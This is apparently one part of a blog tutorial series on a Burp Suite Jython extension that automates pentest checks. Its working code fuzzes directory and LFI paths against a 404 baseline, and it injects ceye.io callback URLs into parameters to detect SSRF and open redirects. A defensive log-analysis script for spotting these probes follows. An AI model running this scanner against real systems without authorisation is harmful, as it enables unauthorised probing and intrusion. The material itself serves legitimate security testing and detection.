
Building a Pentest Automation Pipeline on Burp Suite Extensions (5)

First, analyze the URL and record the status code and response size of its 404 page. Then scan the wordlist and use each response's status code to decide whether the path is a sensitive directory; the status-code rules here are copied from lijiejie's bbscan. In addition, the size difference between the scanned page and the 404 page must be greater than 50 bytes; this threshold can be adjusted dynamically.

from java.net import URL  # Jython: this import lives at module level in the extension

def lfiDir(self, request, protocol, host, port, ishttps, url, html404_status, html404_content):
    # Append each candidate path from the wordlist to the URL and compare the
    # response against the 404 baseline captured earlier (status code + body length).
    for paraNewValue in self.fuzzLFI.dir2:
        newRequest = self._helpers.buildHttpRequest(URL(url + paraNewValue))
        # print(url + paraNewValue)
        newResponse = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
        newAnalyzedRequest, newReqHeaders, newReqBodys, newReqMethod, newReqParameters = self.get_request_info(
            newRequest)
        newResHeaders, newResBodys, newResStatusCode, resLength = self.get_response_info(
            newResponse)

        # Error signatures matched in the body count as a hit on their own.
        errorInject = self.fuzzLFI.errorFlag.findall(newResBodys)

        # Status-code rules follow bbscan: 206, or 200/301/302 whose length differs
        # from the 404 page by more than 50 bytes (the threshold is tunable).
        if errorInject or (newResStatusCode == 206) or (
                (newResStatusCode == 200 or newResStatusCode == 302 or newResStatusCode == 301)
                and abs(resLength - len(html404_content)) > 50):
            newReqUrl = self.get_request_url(protocol, newReqHeaders, host, port)
            content = '[+]{} ->{} {} [Headers] -> {} [Bodys] -> {}'.format(
                '[DIR GET]', errorInject, newReqUrl, newReqHeaders, newReqBodys)
            print(content)
            self.save(content + ' ')
            print('-' * 50)
            break

2.3

For XXE and SSRF over HTTP, the payloads point at ceye.io and dnslog.io; the extension then calls the service's API to check whether a matching DNS-log record was recorded.

SSRF code example; the URL-redirect (open redirect) check is folded into the SSRF check here.

import re  # module-level import in the extension

def ssrfHttp(self, request, protocol, host, port, ishttps, parameterName, parameterValue, parameterType, ResStatusCode):
    # Replace the parameter value with a URL under the ceye.io callback domain; the
    # host + parameter name + fixed token tie any DNS/HTTP log entry back to this parameter.
    paraNewValue = 'http://' + host + '.m4mta5.ceye.io/' + host + parameterName + "testssrf1234567890"
    newParameter = self._helpers.buildParameter(parameterName, paraNewValue, parameterType)
    newRequest = self._helpers.updateParameter(request, newParameter)
    # print(newRequest)
    newResponse = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
    newAnalyzedRequest, newReqHeaders, newReqBodys, newReqMethod, newReqParameters = self.get_request_info(
        newRequest)
    newResHeaders, newResBodys, newResStatusCode, resLength = self.get_response_info(newResponse)

    # Query the ceye.io record API (self.ceyeFin wraps the call) and look for our token.
    pattern = re.compile(host + parameterName + "testssrf1234567890")
    response = self.ceyeFin()
    result = pattern.findall(response)
    if result:
        newReqUrl = self.get_request_url(protocol, newReqHeaders, host, port)
        content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[SSRF GET]', newReqUrl, newReqHeaders, newReqBodys)
        print(content)
        self.save(content + ' ')
        print('-' * 50)

    # Open redirect: the injected URL is echoed in the response headers (e.g. Location)
    # and the status code changed compared with the original response.
    if (paraNewValue in "".join(newResHeaders) and newResStatusCode != ResStatusCode):
        newReqUrl = self.get_request_url(protocol, newReqHeaders, host, port)
        content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[URL GET]', newReqUrl, newReqHeaders,
                                                                       newReqBodys)
        print(content)
        self.save(content + ' ')
        print('-' * 50)
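From the defender's side, both probes above leave recognisable traces in a web server's access log: a run of same-sized 404 responses from one client (the baseline the directory scanner diffs against) and parameter values that are absolute URLs under an out-of-band callback domain such as ceye.io or dnslog.io. The following Python 3 script is an added example and not part of the original extension; the log lines, the 10.0.0.x addresses, the shop.example host and the abc123 ceye identifier are constructed, and the combined-log regex is an assumption about the log format.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Combined-log-format fields up to the byte count; trailing referer/agent are ignored.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

# Callback domains named in the post; extend with the OOB services you track.
OOB_DOMAINS = ("ceye.io", "dnslog.io")

# Constructed sample log (not real traffic): 10.0.0.9 walks a wordlist, then sends
# an SSRF probe whose value is a URL under a ceye.io subdomain; 10.0.0.7 is benign.
SAMPLE_LOG = """\
10.0.0.9 - - [10/Oct/2023:13:55:37 +0000] "GET /admin/ HTTP/1.1" 404 1280 "-" "-"
10.0.0.9 - - [10/Oct/2023:13:55:37 +0000] "GET /backup/ HTTP/1.1" 404 1280 "-" "-"
10.0.0.9 - - [10/Oct/2023:13:55:38 +0000] "GET /old/ HTTP/1.1" 404 1280 "-" "-"
10.0.0.9 - - [10/Oct/2023:13:55:38 +0000] "GET /test/ HTTP/1.1" 404 1280 "-" "-"
10.0.0.9 - - [10/Oct/2023:13:55:39 +0000] "GET /fetch?url=http%3A%2F%2Fshop.example.abc123.ceye.io%2F HTTP/1.1" 200 300 "-" "-"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /fetch?url=https%3A%2F%2Fcdn.example%2Fa.png HTTP/1.1" 200 9000 "-" "-"
"""

def parse_line(line):
    # One access-log line -> dict of fields, or None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"], d["size"] = int(d["status"]), int(d["size"].replace("-", "0"))
    return d

def find_dir_scanners(lines, min_404=4):
    """Clients with >= min_404 404s of one size (the scanner's baseline) -> {ip: (count, size)}."""
    per_ip = {}
    for r in filter(None, map(parse_line, lines)):
        if r["status"] == 404:
            per_ip.setdefault(r["ip"], Counter())[r["size"]] += 1
    best = {ip: c.most_common(1)[0] for ip, c in per_ip.items()}  # (size, count)
    return {ip: (n, size) for ip, (size, n) in best.items() if n >= min_404}

def find_oob_callbacks(lines):
    """Query values that are absolute URLs to a known OOB domain -> [(ip, param, host)]."""
    hits = []
    for r in filter(None, map(parse_line, lines)):
        for name, value in parse_qsl(urlsplit(r["path"]).query):
            host = urlsplit(value).hostname or ""
            if any(host == d or host.endswith("." + d) for d in OOB_DOMAINS):
                hits.append((r["ip"], name, host))
    return hits
```

Run both functions over `SAMPLE_LOG.splitlines()`: only 10.0.0.9 is reported, once as a directory scanner and once for the ceye.io callback, while the benign fetch from 10.0.0.7 is not flagged.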

4. Results

[Screenshots: SSRF via the file protocol; DirScan]
